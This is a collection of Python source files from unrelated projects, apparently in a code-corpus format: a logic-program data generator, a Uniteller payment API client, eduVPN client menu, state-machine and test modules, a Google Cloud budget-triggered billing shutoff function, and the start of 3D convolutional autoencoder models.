IDX_CHAR = [0]
IDX_CHAR.extend(CHARS)
# Predicate Templates
FACT_T = "{}."
RULE_T = "{}:-{}."
PRED_T = "{}({})"
ARG_SEP = ','
PRED_SEP = ';'
NEG_PREFIX = '-'
TARGET_T = "? {} {}"
# pylint: disable=line-too-long,too-many-arguments,too-many-statements
def r_string(symbols, length):
"""Return random sequence from given symbols."""
return ''.join(R.choice(symbols)
for _ in range(length))
def r_symbols(size, symbols, length, used=None):
"""Return unique random from given symbols."""
if length == 1 and not used:
return R.sample(symbols, size)
rset, used = set(), set(used or [])
while len(rset) < size:
s = r_string(symbols, R.randint(1, length))
if s not in used:
rset.add(s)
return list(rset)
def r_consts(size, used=None):
"""Return size many unique constants."""
return r_symbols(size, CONST_SYMBOLS, ARGS.constant_length, used)
def r_vars(size, used=None):
"""Return size many unique variables."""
return r_symbols(size, VAR_SYMBOLS, ARGS.variable_length, used)
def r_preds(size, used=None):
"""Return size many unique predicates."""
return r_symbols(size, PRED_SYMBOLS, ARGS.predicate_length, used)
def write_p(pred):
"""Format single predicate tuple into string."""
return PRED_T.format(pred[0], ARG_SEP.join(pred[1:]))
def write_r(preds):
"""Convert rule predicate tuple into string."""
head = write_p(preds[0])
# Is it just a fact
if len(preds) == 1:
return FACT_T.format(head)
# We have a rule
return RULE_T.format(head, PRED_SEP.join([write_p(p) for p in preds[1:]]))
def output(context, targets):
"""Print the context and given targets."""
# context: [[('p', 'a', 'b')], ...]
# targets: [(('p', 'a', 'b'), 1), ...]
if ARGS.shuffle_context:
R.shuffle(context)
print('\n'.join([write_r(c) for c in context]))
for t, v in targets:
print(TARGET_T.format(write_r([t]), v))
def cv_mismatch(consts):
"""Returns a possible mismatching variable binding for given constants."""
if len(consts) <= 1 or len(set(consts)) == 1:
return list()
# We know some constant is different
# [a,b,a,c] -> [X,Y,Y,Z]
# [a,b] -> [X,X] are mismatches
# assign same variables to different constants
vs = r_vars(len(consts)-1) # [X,Y,Z,..]
for i, c in enumerate(consts[1:]):
if c != consts[0]:
# we haven't seen it before
vs.insert(i+1,vs[0])
break
assert len(vs) == len(consts)
return vs
def cv_match(consts):
"""Returns a possible matching variable binding for given constants."""
if len(consts) <= 1:
return r_vars(len(consts))
# We want to *randomly* assing the same variable to same constants
# [a,a,b] -> [X,Y,Z] -> [X,X,Y]
vs = r_vars(len(consts))
cvmap = dict()
for i, c in enumerate(consts):
if c in cvmap:
if R.random() < 0.5:
vs[i] = cvmap[c] # assign the same variable
# otherwise get a unique variable
else:
cvmap[c] = vs[i]
assert len(vs) == len(consts)
return vs
def generate(depth=0, context=None, target=None, success=None,
upreds=None, uconsts=None, stats=None):
"""Generate tree based logic program."""
ctx = context or list()
args = target[1:] if target else [r_consts(1)[0] for _ in range(ARGS.arity)]
t = target or [r_preds(1)[0]] + [R.choice(args) for _ in range(R.randint(1, ARGS.arity))]
arity = len(t[1:])
succ = success if success is not None else R.choice((True, False))
upreds = upreds or set([t[0]])
uconsts = uconsts or set(t[1:])
stats = stats or dict()
# Create rule OR branching
num_rules = R.randint(1, ARGS.max_or_branch)
stats.setdefault('or_num', list()).append(num_rules)
# If the rule succeeds than at least one branch must succeed
succs = [R.choice((True, False)) for _ in range(num_rules)] \
if succ else [False]*num_rules # otherwise all branches must fail
if succ and not any(succs):
# Ensure at least one OR branch succeeds
succs[R.randrange(len(succs))] = True
# Rule depths randomised between 0 to max depth
depths = [R.randint(0, depth) for _ in range(num_rules)]
if max(depths) != depth:
depths[R.randrange(num_rules)] = depth
# print("HERE:", num_rules, succs, depths, t)
# Generate OR branches
is_tadded = False
for child_depth, child_succ in zip(depths, succs):
# Base case
if child_depth == 0:
if R.random() < 0.20:
# The constant doesn't match
args = t[1:]
args[R.randrange(len(args))] = r_consts(1, uconsts)[0]
uconsts.update(args)
ctx.append([[t[0]] + args])
if R.random() < 0.20:
# The predicate doesn't match
p = r_preds(1, upreds)[0]
upreds.add(p)
ctx.append([[p,] + t[1:]])
if R.random() < 0.20:
# The arity doesn't match
ctx.append([[t[0]] + t[1:] + [R.choice(t[1:] + r_consts(arity))]])
if R.random() < 0.20:
# The variables don't match
vs = cv_mismatch(t[1:])
if vs:
ctx.append([[t[0]] + vs])
# The predicate doesn't appear at all
if child_succ:
if R.random() < 0.5:
# p(X). case
ctx.append([[t[0]] + cv_match(t[1:])])
elif not is_tadded:
# ground case
ctx.append([t])
is_tadded = True
continue
# Recursive case
num_body = R.randint(1, ARGS.max_and_branch)
stats.setdefault('body_num', list()).append(num_body)
negation = [R.choice((True, False)) for _ in range(num_body)] \
if ARGS.negation else [False]*num_body
# Compute recursive success targets
succ_targets = [R.choice((True, False)) for _ in range(num_body)] \
if not child_succ else [not n for n in negation]
if not child_succ:
# Ensure a failed target
ri = R.randrange(len(succ_targets))
# succeeding negation fails this, vice versa
succ_targets[ri] = negation[ri]
# Create rule
body_preds = r_preds(num_body, upreds)
upreds.update(body_preds)
lit_vars = cv_match(t[1:])
if not child_succ and R.random() < 0.5:
# Fail due to variable pattern mismatch
vs = cv_mismatch(t[1:])
if vs:
lit_vars = vs
succ_targets = [R.choice((True, False)) for _ in range(num_body)]
lit_vars.extend([r_vars(1)[0] for _ in range(ARGS.unbound_vars)])
rule = [[t[0]]+lit_vars[:arity]]
vcmap = {lit_vars[i]:t[i+1] for i in range(arity)}
# Compute child targets
child_targets = list()
for i in range(num_body):
R.shuffle(lit_vars)
child_arity = R.randint(1, arity)
pred = [body_preds[i]] + lit_vars[:child_arity]
rule.append([(NEG_PREFIX if negation[i] else "") + pred[0]] + pred[1:])
vs = [vcmap.get(v, r_consts(1, uconsts)[0]) for v in lit_vars[:child_arity]]
child_targets.append([pred[0]]+vs)
ctx.append(rule)
# Recurse
for child_t, s in zip(child_targets, succ_targets):
generate(child_depth-1, ctx, child_t, s, upreds, uconsts, stats)
return ctx, [(t, int(succ))], stats
if __name__ == '__main__':
# Arguments
parser = argparse.ArgumentParser(description="Generate logic program data.")
parser.add_argument("-d", "--depth", default=0, type=int, help="The depth of the logic program.")
parser.add_argument("-mob", "--max_or_branch", default=1, type=int, help="Upper bound on number of branches.")
parser.add_argument("-mab", "--max_and_branch", default=1, type=int, help="Upper bound on number of branches.")
parser.add_argument("-s", "--size", default=1, type=int, help="Number of programs to generate.")
# Configuration parameters
parser.add_argument("-uv", "--unbound_vars", default=0, type=int, help="Number of unbound variables.")
parser.add_argument("-ar", "--arity", default=2, type=int, help="Upper bound on arity of literals.")
parser.add_argument("-n", "--negation", action="store_true", help="Use negation by failure.")
parser.add_argument("-cl", "--constant_length", default=2, type=int, help="Length of constants.")
parser.add_argument("-vl", "--variable_length", default=1, type=int, help="Length of variables.")
parser.add_argument("-pl", "--predicate_length", default=2, type=int, help="Length of predicates.")
parser.add_argument("-sf", "--shuffle_context", action="store_true", help="Shuffle context before output.")
ARGS = parser.parse_args()
for _ in range(ARGS.size):
context_out, targets_out, _ = generate(depth=ARGS.depth)
output(context_out, targets_out)
```
#### File: deeplogic/models/__init__.py
```python
import importlib
def build_model(model_name, weights_file=None, **kwargs):
"""Build the desired model."""
mod = importlib.import_module("."+model_name, __name__)
model = mod.build_model(**kwargs)
if weights_file:
try:
model.load_weights(weights_file, by_name=True)
print("Loaded existing model:", weights_file)
except Exception as e: # pylint: disable=broad-except
print("Error loading model:", e)
return model
``` |
{
"source": "14MR/flask_uniteller",
"score": 2
} |
#### File: flask_uniteller/libs/uniteller_api.py
```python
import hashlib
import string
import csv
from console import app
from grab import Grab
from lxml import etree
class UnitellerApi(object):
CODE_SUCCESS = 'AS000'
STATUS_COMPLETE = 'Paid'
STATUS_AUTH = 'Authorized'
STATUS_CANCELED = 'Canceled'
SUCCESS_NO = 0
SUCCESS_YES = 1
SUCCESS_ALL = 2
EMPTY_ORDER = dict(
order_id='',
amount='',
mean_type='',
money_type='',
life_time='',
customer_id='',
card_id='',
l_data='',
paymen_type='',
)
def __init__(self, const):
self.const = const
self.grab = None
self.order_id = None
self.success = self.SUCCESS_ALL
self.shop_id = self.const.SHOP_ID
self.password = <PASSWORD>
self.login = self.const.LOGIN
self.prefix = self.const.TEST and self.const.TEST_PREFIX or self.const.DEFAULT_PREFIX
def __repr__(self):
return "%s" % self.const
def get_url(self, method):
return "%s%s/%s/" % (self.prefix, self.const.GENERAL_URL, method)
def get_sing(self, order):
result = [hashlib.md5(str(value)).hexdigest() for value in order]
return string.upper(hashlib.md5(str('&'.join(result))).hexdigest())
def get_reccurent_sing(self, order):
"""Обязательные данные - order_id, amount, parent_order_id"""
data = (
self.shop_id,
order['order_id'],
order['amount'],
order['parent_order_id'],
self.password
)
return self.get_sing(data)
def get_payment_sing(self, order):
full_order = dict(self.EMPTY_ORDER, **order)
data = (
self.shop_id,
full_order['order_id'],
full_order['amount'],
full_order['mean_type'],
full_order['money_type'],
full_order['life_time'],
full_order['customer_id'],
full_order['card_id'],
full_order['l_data'],
full_order['paymen_type'],
self.password
)
return self.get_sing(data)
def set_request(self, url, data=None):
return_data = False
if not self.grab:
self.grab = Grab()
if data:
self.grab.setup(post=data)
try:
self.grab.go(url)
except Exception as e:
app.logger.error(e)
else:
return_data = self.grab
return return_data
def get_payment_info(self, order_id=None):
return_data = False
keys = (
'ordernumber',
'response_code',
'total',
'currency',
'date',
'billnumber',
'status',
'cardnumber',
'phone',
'ipaddress',
)
data = dict(
Shop_ID=self.shop_id,
Login=self.login,
Password=<PASSWORD>,
Format=4,
Success=self.success
)
if order_id:
data['ShopOrderNumber'] = order_id
result = self.set_request(self.get_url('results'), data)
if result:
try:
tree = etree.fromstring(result.response.body)
except Exception as e:
app.logger.error(e)
app.logger.error(result.response.body)
else:
event_nodes = tree.xpath(
'/unitellerresult/orders/order')
return_data = {}
for event_node in event_nodes:
data = {}
for key in keys:
data[key] = event_node.find(key).text
if 'ordernumber' in data:
return_data[data['ordernumber']] = data
return return_data
def reccurent_payment(self, order):
"""Обязательные данные - order_id, amount, parent_order_id"""
return_data = False
data = dict(
Shop_IDP=self.shop_id,
Order_IDP=order['order_id'],
Subtotal_P=order['amount'],
Parent_Order_IDP=order['parent_order_id'],
Signature=self.get_reccurent_sing(order)
)
result = self.set_request(self.get_url('recurrent'), data)
if result:
data = result.response.body
reader = csv.reader(data.split('\n'), delimiter=';')
response_code = None
for row in reader:
if len(row) > 1:
response_code = row[1]
return_data = response_code
return return_data
def _request(self, order_id, method):
return_data = False
info = self.get_payment_info(order_id)
if info:
data = dict(
Billnumber=info[str(order_id)]['billnumber'],
Shop_ID=self.shop_id,
Login=self.login,
Password=<PASSWORD>,
)
result = self.set_request(self.get_url(method), data)
if result:
data = result.response.body
reader = csv.DictReader(data.split('\n'), delimiter=';')
if not 'ErrorCode' in reader.fieldnames:
return_data = True
return return_data
def unblock_payment(self, order_id):
return self._request(order_id, 'unblock')
def confirm_payment(self, order_id):
return self._request(order_id, 'confirm')
``` |
{
"source": "14mRh4X0r/python-eduvpn-client",
"score": 3
} |
#### File: python-eduvpn-client/eduvpn/menu.py
```python
from logging import getLogger
from argparse import Namespace
from itertools import chain
from pathlib import Path
from sys import exit
from typing import List, Dict, Optional, Tuple, Any
from eduvpn.i18n import extract_translation
from eduvpn.nm import nm_available, save_connection_with_mainloop
from eduvpn.remote import list_servers, list_organisations
from eduvpn.settings import SERVER_URI, ORGANISATION_URI
from eduvpn.storage import write_config
_logger = getLogger()
ServerListType = List[Dict[str, Any]]
def fetch_servers_orgs() -> Tuple[ServerListType, ServerListType]:
servers = list_servers(SERVER_URI)
orgs = list_organisations(ORGANISATION_URI)
return servers, orgs
def input_int(max_: int):
"""
Request the user to enter a number.
"""
while True:
choice = input("\n> ")
if choice.isdigit() and int(choice) < max_:
break
else:
print("error: invalid choice")
return int(choice)
def provider_choice(institutes: List[dict], orgs: List[dict]) -> Tuple[str, str, Optional[str], bool]:
"""
Ask the user to make a choice from a list of institute and secure internet providers.
returns:
url, display_name, contact, bool. Bool indicates if it is secure_internet or not.
"""
print("\nPlease choose server:\n")
print("Institute access:")
for i, row in enumerate(institutes):
print(f"[{i}] {extract_translation(row['display_name'])}")
print("Secure internet: \n")
for i, row in enumerate(orgs, start=len(institutes)):
print(f"[{i}] {extract_translation(row['display_name'])}")
choice = input_int(max_=len(institutes) + len(orgs))
if choice < len(institutes):
institute = institutes[choice]
return institute['base_url'], extract_translation(institute['display_name']), institute[
'support_contact'], False
else:
org = orgs[choice - len(institutes)]
return org['secure_internet_home'], extract_translation(org['display_name']), None, True
def menu(
institutes: List[dict],
orgs: List[dict],
search_term: Optional[str] = None
) -> Tuple[str, str, Optional[str], bool]:
"""
returns:
url, bool. Bool indicates if it is secure_internet or not.
"""
# todo: add initial search filtering
return provider_choice(institutes, orgs)
def profile_choice(profiles: List[Dict]) -> str:
"""
If multiple profiles are available, present user with choice which profile.
"""
if len(profiles) > 1:
print("\nplease choose a profile:\n")
for i, profile in enumerate(profiles):
print(f" * [{i}] {profile['display_name']}")
choice = input_int(max_=len(profiles))
return profiles[int(choice)]['profile_id']
else:
return profiles[0]['profile_id']
def write_to_nm_choice() -> bool:
"""
When Network Manager is available, asks user to add VPN to Network Manager
"""
print("\nWhat would you like to do with your VPN configuration:\n")
print("* [0] Write .ovpn file to current directory")
print("* [1] Add VPN configuration to Network Manager")
return bool(input_int(max_=2))
def secure_internet_choice(secure_internets: List[dict]) -> Optional[Tuple[str, str]]:
print("Do you want to select a secure internet location? If not we use the default.")
while True:
choice = input("\n[N/y] > ").strip().lower()
if choice == 'n' or not choice:
return None
elif choice == 'y':
print("\nplease choose a secure internet server:\n")
for i, profile in enumerate(secure_internets):
print(f" * [{i}] {extract_translation(profile['country_code'])}")
choice = input_int(max_=len(secure_internets))
base_url = secure_internets[int(choice)]['base_url']
country_code = secure_internets[int(choice)]['country_code']
return base_url, country_code
else:
print("error: invalid choice, please enter y, n or just leave empty")
def search(args: Namespace):
search_term = args.match
servers, orgs = fetch_servers_orgs()
institute_matches, org_matches = match_term(servers, orgs, search_term)
print(f"Your search term '{search_term}' matched with the following institutes/organisations:\n")
if len(institute_matches):
print("Institute access:")
for i, row in institute_matches:
print(f"[{i}] {extract_translation(row['display_name'])}")
if len(org_matches):
print("\nSecure internet: \n")
for i, row in org_matches:
print(f"[{i}] {extract_translation(row['display_name'])}")
def configure(args: Namespace) -> Tuple[str, str, Optional[str], Optional[ServerListType]]:
search_term = args.match
servers, orgs = fetch_servers_orgs()
secure_internets = [s for s in servers if s['server_type'] == 'secure_internet']
institute_matches, org_matches = match_term(servers, orgs, search_term, exact=True)
if isinstance(search_term, str) and search_term.lower().startswith('https://'):
return search_term, search_term, None, None
else:
if len(institute_matches) == 0 and len(org_matches) == 0:
print(f"The filter '{search_term}' had no matches")
exit(1)
elif len(institute_matches) == 1 and len(org_matches) == 0:
index, institute = institute_matches[0]
print(f"filter '{search_term}' matched with institute '{institute['display_name']}'")
return institute['base_url'], extract_translation(institute['display_name']), institute[
'support_contact'], None
elif len(institute_matches) == 0 and len(org_matches) == 1:
index, org = org_matches[0]
print(f"filter '{search_term}' matched with organisation '{org['display_name']}'")
return org['secure_internet_home'], extract_translation(org['display_name']), None, secure_internets
else:
matches = [i[1]['display_name'] for i in chain(institute_matches, org_matches)]
print(
f"filter '{search_term}' matched with {len(matches)} institutes and organisations, please be more specific.")
print("Matches:")
for m in matches:
print(f" - {extract_translation(m)}")
exit(1)
def interactive(args: Namespace) -> Tuple[str, str, Optional[str], Optional[ServerListType]]:
"""
returns:
auth_url, display_name, support_contact, secure_internets
"""
search_term = args.match
if isinstance(search_term, str) and search_term.lower().startswith('https://'):
return search_term, search_term, None, None
servers = list_servers(SERVER_URI)
secure_internets = [s for s in servers if s['server_type'] == 'secure_internet']
institute_access = [s for s in servers if s['server_type'] == 'institute_access']
orgs = list_organisations(ORGANISATION_URI)
choice = menu(institutes=institute_access, orgs=orgs, search_term=search_term)
if not choice:
exit(1)
auth_url, display_name, support_contact, secure_internet = choice
if not secure_internet:
return auth_url, display_name, support_contact, None
return auth_url, display_name, support_contact, secure_internets
def match_term(
servers: ServerListType,
orgs: ServerListType,
search_term: Optional[str], exact=False
) -> Tuple[List[Tuple[int, Dict[str, Any]]], List[Tuple[int, Dict[str, Any]]]]:
"""
Search the list of institutes and organisations for a string match.
returns:
None or (type ('base_url' or 'secure_internet_home'), url)
"""
institute_access = [s for s in servers if s['server_type'] == 'institute_access']
if not search_term:
return list(enumerate(institute_access)), list(enumerate(orgs, len(institute_access)))
institute_matches: List[Tuple[int, Dict[str, Any]]] = []
for x, i in enumerate(institute_access):
if not exact:
if search_term.lower() in extract_translation(i['display_name']).lower():
institute_matches.append((x, i))
if exact:
if search_term.lower() == extract_translation(i['display_name']).lower():
institute_matches.append((x, i))
org_matches: List[Tuple[int, Dict[str, Any]]] = []
for x, i in enumerate(orgs, len(institute_access)):
if not exact:
if search_term.lower() in extract_translation(i['display_name']).lower() \
or 'keyword_list' in i and search_term in i['keyword_list']:
org_matches.append((x, i))
if exact:
if search_term.lower() == extract_translation(i['display_name']).lower():
org_matches.append((x, i))
return institute_matches, org_matches
def store_configuration(config, private_key, certificate, interactive=False):
target = Path('eduVPN.ovpn').resolve()
if interactive and nm_available():
if write_to_nm_choice():
save_connection_with_mainloop(config, private_key, certificate)
else:
write_config(config, private_key, certificate, target)
else:
if nm_available():
save_connection_with_mainloop(config, private_key, certificate)
else:
write_config(config, private_key, certificate, target)
```
#### File: python-eduvpn-client/eduvpn/state_machine.py
```python
from typing import (
TypeVar, Generic, Any, Union, Optional, Callable,
Type, Iterable, Tuple, Dict, Set)
import enum
class TransitionEdge(enum.Enum):
"""
The edge of a state lifetime.
The edge is `enter` when the state starts,
and `exit` when it ends.
"""
enter = enum.auto()
exit = enum.auto()
ENTER = TransitionEdge.enter
EXIT = TransitionEdge.exit
# typing aliases
State = TypeVar('State')
StateType = Type[State]
Callback = Callable[[State, State], None]
StateTargets = Union[StateType, Iterable[StateType]]
CallbackRegistry = Dict[
Optional[Tuple[StateType, TransitionEdge]],
Set[Callback]]
TRANSITION_CALLBACK_MARKER = '__transition_callback_for_state'
def setattr_list_item(obj, attr, item):
try:
list_attr = getattr(obj, attr)
except AttributeError:
list_attr = []
setattr(obj, attr, list_attr)
list_attr.append(item)
def transition_callback(state_targets: StateTargets):
"""
Decorator factory to mark a method as a
transition callback for all transitions.
Note the argument is the base class for states of the state machine
to register transition events of.
Without this, there would be no way to know which
state machine this callback targets.
"""
if not isinstance(state_targets, tuple):
# Normalise argument to tuple.
state_targets = (state_targets, ) # type: ignore
def decorator(func: Callback):
for state_type in state_targets:
setattr_list_item(func,
TRANSITION_CALLBACK_MARKER,
(None, state_type))
return func
return decorator
def transition_edge_callback(edge: TransitionEdge,
state_targets: StateTargets):
"""
Decorator factory to mark a method as a transition callback
for specific state transition edges.
"""
if not isinstance(state_targets, tuple):
# Normalise argument to tuple.
state_targets = (state_targets, ) # type: ignore
def decorator(func: Callback):
for state_type in state_targets:
setattr_list_item(func,
TRANSITION_CALLBACK_MARKER,
(edge, state_type))
return func
return decorator
def _find_transition_callbacks(obj: Any, base_state_type: Type[State]):
for attr in dir(obj):
callback = getattr(obj, attr)
try:
registrations = getattr(callback, TRANSITION_CALLBACK_MARKER)
except AttributeError:
pass
else:
for edge, state_type in registrations:
if issubclass(state_type, base_state_type):
yield callback, edge, state_type
class InvalidStateTransition(Exception):
def __init__(self, name: str):
self.name = name
class StateMachine(Generic[State]):
"""
State machine wrapper that allows registering transition callbacks.
"""
def __init__(self, initial_state: State):
self._state = initial_state
self._callbacks: CallbackRegistry = {}
@property
def state(self) -> State:
"""
Obtain the current state.
The state can be changed by calling `transition()`
with the name of a transition of the current state.
"""
# The state is behind a property to prevent setting it directly.
return self._state
def transition(self, transition: str, *args, **kwargs):
"""
Transition to a new state.
This method is *not* thread-safe,
all calls should be made from the same thread.
"""
old_state = self._state
try:
transition_func = getattr(old_state, transition)
except AttributeError as e:
raise InvalidStateTransition(transition) from e
new_state = transition_func(*args, **kwargs)
self._call_edge_callbacks(EXIT, old_state, new_state)
self._state = new_state
self._call_generic_callbacks(old_state, new_state)
self._call_edge_callbacks(ENTER, old_state, new_state)
return new_state
def register_generic_callback(self, callback: Callback):
"""
Register a callback for all transitions.
"""
self._callbacks.setdefault(None, set()).add(callback)
def register_edge_callback(self,
state_type: Type[State],
edge: TransitionEdge,
callback: Callback):
"""
Register a callback for specific transition edges.
"""
self._callbacks.setdefault((state_type, edge), set()).add(callback)
def connect_object_callbacks(self, obj, base_state_type: Type[State]):
"""
Register all state transition callback methods decorated with
`@transition_callback()` and `@transition_edge_callback()`
of an object.
Provide the base class of states for this state machine
as the second argument to filter registrations for this
state machine only.
Only method registered to a subclass of this base class
will be connected.
"""
iterator = _find_transition_callbacks(obj, base_state_type)
for callback, edge, state_type in iterator:
if edge is None:
# This callback targets all events.
self.register_generic_callback(callback)
else:
# This callback targets a specific state edge.
self.register_edge_callback(state_type, edge, callback)
def _call_generic_callbacks(self, old_state: State, new_state: State):
for callback in self._callbacks.get(None, []):
callback(old_state, new_state)
def _call_edge_callbacks(self,
edge: TransitionEdge,
old_state: State,
new_state: State):
state = new_state if edge is ENTER else old_state
for callback in self._callbacks.get((state.__class__, edge), []):
callback(old_state, new_state)
class BaseState:
"""
Base class for all state machine states.
"""
def __repr__(self):
fields = ','.join(f' {k}={v!r}' for k, v in self.__dict__.items())
return f'<{self.__class__.__name__}{fields}>'
def has_transition(self, name: str) -> bool:
"""
Return True if this state defines the transition function.
"""
return hasattr(self, name)
def copy(self, **fields):
"""
Return a copy of this state, with some fields altered.
"""
return self.__class__(**{**self.__dict__, **fields})
```
#### File: eduvpn/ui/utils.py
```python
from eduvpn.utils import logger
import gi
gi.require_version('Gtk', '3.0') # noqa: E402
from gi.repository import Gtk, GObject
# ui thread
def error_helper(parent: GObject, # type: ignore
msg_big: str,
msg_small: str) -> None:
"""
Shows a GTK error message dialog.
args:
parent (GObject): A GTK Window
msg_big (str): the big string
msg_small (str): the small string
"""
logger.error(f"{msg_big}: {msg_small}")
error_dialog = Gtk.MessageDialog( # type: ignore
parent,
0,
Gtk.MessageType.ERROR, # type: ignore
Gtk.ButtonsType.OK, # type: ignore
str(msg_big),
)
error_dialog.format_secondary_text(str(msg_small)) # type: ignore
error_dialog.run() # type: ignore
error_dialog.hide() # type: ignore
def show_ui_component(builder, component: str, show: bool):
"""
Set the visibility of a UI component.
"""
component = builder.get_object(component)
if show:
component.show() # type: ignore
else:
component.hide() # type: ignore
def link_markup(link: str) -> str:
try:
scheme, rest = link.split(':', 1)
if rest.startswith('//'):
rest = rest[2:]
except ValueError:
return link
else:
return f'<a href="{link}">{rest}</a>'
```
#### File: python-eduvpn-client/tests/test_flow.py
```python
from unittest import TestCase
from unittest.mock import patch
from time import sleep
from .utils import (
remove_existing_config, create_test_app,
skip_if_network_manager_not_supported,
)
from .state_utils import StateTestCaseMixin
PROFILE_NAME_1 = 'Test Profile A'
PROFILE_NAME_2 = 'Test Profile B'
class TestOAuthSession:
def refresh_token(self, token_url):
pass
def get(self, url):
return TestOAuthResponse()
class TestOAuthResponse:
status_code = 200
def json(self):
return dict(
profile_list={'data': [
dict(
profile_id='t1',
display_name=PROFILE_NAME_1,
two_factor=False,
default_gateway=True,
),
dict(
profile_id='t2',
display_name=PROFILE_NAME_2,
two_factor=False,
default_gateway=True,
),
]},
)
class FlowTests(StateTestCaseMixin, TestCase):
@skip_if_network_manager_not_supported
def test_first_start(self):
from eduvpn.interface import state as interface_state
from eduvpn import network as network_state
remove_existing_config()
app = create_test_app()
self.assertReachesInterfaceState(app, interface_state.ConfigurePredefinedServer)
self.assertIsNone(app.interface_state.results)
self.assertReachesNetworkState(app, network_state.UnconnectedState)
# search for a server called 'demo'
app.interface_transition('enter_search_query', 'demo')
self.assertReachesInterfaceState(app, interface_state.ConfigurePredefinedServer)
self.assertEqual(
list(map(str, app.interface_state.results)),
['Demo'],
)
server = app.interface_state.results[0]
# perform the oauth login
with patch('eduvpn.oauth2.run_challenge_in_background') as oauth_func:
with patch('webbrowser.open') as webbrowser_open:
url = 'test-url'
webserver = object()
callback = None
def oauth_challenge(token_endpoint, auth_endpoint, app_variant, cb):
nonlocal callback
callback = cb
return webserver, url
oauth_func.side_effect = oauth_challenge
app.interface_transition('connect_to_server', server)
self.assertReachesInterfaceState(app, interface_state.OAuthSetup)
self.assertIs(app.interface_state.oauth_web_server, webserver)
webbrowser_open.assert_called_once_with(url)
self.assertIsNotNone(callback)
oauth_session = TestOAuthSession()
callback(oauth_session)
self.assertReachesInterfaceState(app, interface_state.ChooseProfile)
self.assertEqual(
list(map(str, app.interface_state.profiles)),
[PROFILE_NAME_1, PROFILE_NAME_2],
)
```
#### File: python-eduvpn-client/tests/test_main.py
```python
from unittest import TestCase
from eduvpn.cli import parse_eduvpn
class TestMain(TestCase):
def test_parse_args(self):
with self.assertRaises(SystemExit):
parse_eduvpn(["test"])
```
#### File: python-eduvpn-client/tests/test_menu.py
```python
from argparse import Namespace
from unittest import TestCase, mock
from unittest.mock import patch, MagicMock
from tests.mock_config import mock_server, mock_org
from eduvpn.menu import menu, input_int, profile_choice, provider_choice, write_to_nm_choice
from eduvpn.menu import search, configure, interactive, match_term, fetch_servers_orgs
class TestMenu(TestCase):
def test_menu(self):
with mock.patch('builtins.input', lambda _: '0'):
menu(institutes=[{'display_name': 'test', 'base_url': 'no url', 'support_contact': '<EMAIL>'}], orgs=[], search_term="test")
def test_input_int(self):
with mock.patch('builtins.input', lambda _: '1'):
input_int(max_=3)
def test_profile_choice(self):
profiles = [{'profile_id': 'internet'}]
profile_choice(profiles=profiles)
def test_provider_choice(self):
base_uri = 'bla'
institutes = [{'display_name': 'test', 'base_url': base_uri, 'support_contact': '<EMAIL>'}]
with mock.patch('builtins.input', lambda _: '0'):
url, display_name, contact, secure_internet = provider_choice(institutes=institutes, orgs=[])
self.assertEqual(secure_internet, False)
self.assertEqual(base_uri, url)
def test_write_to_nm_choice(self):
with mock.patch('builtins.input', lambda _: '1'):
write_to_nm_choice()
@patch('eduvpn.menu.fetch_servers_orgs')
@patch('eduvpn.actions.fetch_token')
def test_configure(self, _: MagicMock, fetch_servers_orgs_: MagicMock):
fetch_servers_orgs_.return_value = [mock_server], [mock_org]
configure(Namespace(match='bogus'))
configure(Namespace(match=''))
def test_match_term(self):
match_term(servers=[], orgs=[], search_term="search")
@patch('eduvpn.menu.fetch_servers_orgs')
def test_search(self, fetch_servers_orgs_: MagicMock):
fetch_servers_orgs_.return_value = [mock_server], [mock_org]
search(Namespace(match='bogus'))
@patch('eduvpn.menu.list_servers')
@patch('eduvpn.menu.list_organisations')
def test_fetch_servers_orgs(self, list_organisations, list_servers):
fetch_servers_orgs()
def test_main_with_url(self):
args = MagicMock()
args.match = "https://test"
interactive(args)
``` |
{
"source": "14Ricardo/python-docs-samples",
"score": 3
} |
#### File: python-docs-samples/billing/main.py
```python
import base64
import json
import google.auth
from google.cloud import billing
PROJECT_ID = google.auth.default()[1]
cloud_billing_client = billing.CloudBillingClient()
def stop_billing(data: dict, context):
pubsub_data = base64.b64decode(data["data"]).decode("utf-8")
pubsub_json = json.loads(pubsub_data)
cost_amount = pubsub_json["costAmount"]
budget_amount = pubsub_json["budgetAmount"]
if cost_amount <= budget_amount:
print(f"No action necessary. (Current cost: {cost_amount})")
return
project_name = cloud_billing_client.common_project_path(PROJECT_ID)
billing_enabled = _is_billing_enabled(project_name)
if billing_enabled:
_disable_billing_for_project(project_name)
else:
print("Billing already disabled")
def _is_billing_enabled(project_name: str) -> bool:
"""Determine whether billing is enabled for a project
Args:
project_name (str): Name of project to check if billing is enabled
Returns:
bool: Whether project has billing enabled or not
"""
request = billing.GetProjectBillingInfoRequest(name=project_name)
project_billing_info = cloud_billing_client.get_project_billing_info(request)
return project_billing_info.billing_enabled
def _disable_billing_for_project(project_name: str) -> None:
"""Disable billing for a project by removing its billing account
Args:
project_name (str): Name of project disable billing on
"""
request = billing.UpdateProjectBillingInfoRequest(
name=project_name,
project_billing_info=billing.ProjectBillingInfo(
billing_account_name="" # Disable billing
),
)
project_biling_info = cloud_billing_client.update_project_billing_info(request)
print(f"Billing disabled: {project_biling_info}")
``` |
{
"source": "14thibea/deep_learning_ADNI",
"score": 3
} |
#### File: deep_learning_ADNI/main/autoencoder_training.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from os import path
import os
import numpy as np
import pandas as pd
from copy import copy, deepcopy
class LargeAutoEncoder(nn.Module):
"""
Sparse Autoencoder for transfer learning
"""
def __init__(self):
super(LargeAutoEncoder, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, 150, 5)
self.decode = nn.ConvTranspose3d(150, 1, 5)
def forward(self, x):
d = self.downsample(x)
h = F.relu(self.encode(d))
out = F.relu(self.decode(h))
return out, h, d
class LargeConvolutionalNetwork(nn.Module):
"""
Classifier for binary classification task
"""
def __init__(self, n_classes=2):
super(LargeConvolutionalNetwork, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, 150, 5)
self.pool = nn.MaxPool3d(5, 5)
self.fc1 = nn.Linear(150 * 11 * 13 * 11, 800)
self.fc2 = nn.Linear(800, n_classes)
def forward(self, x):
d = self.downsample(x)
h = F.relu(self.encode(d))
h = self.pool(h)
h = h.view(-1, 150 * 11 * 13 * 11)
h = F.relu(self.fc1(h))
out = self.fc2(h)
return out
class AdaptativeAutoEncoder(nn.Module):
"""
Sparse Autoencoder for transfer learning
"""
def __init__(self, n_filters):
super(AdaptativeAutoEncoder, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, n_filters, 5)
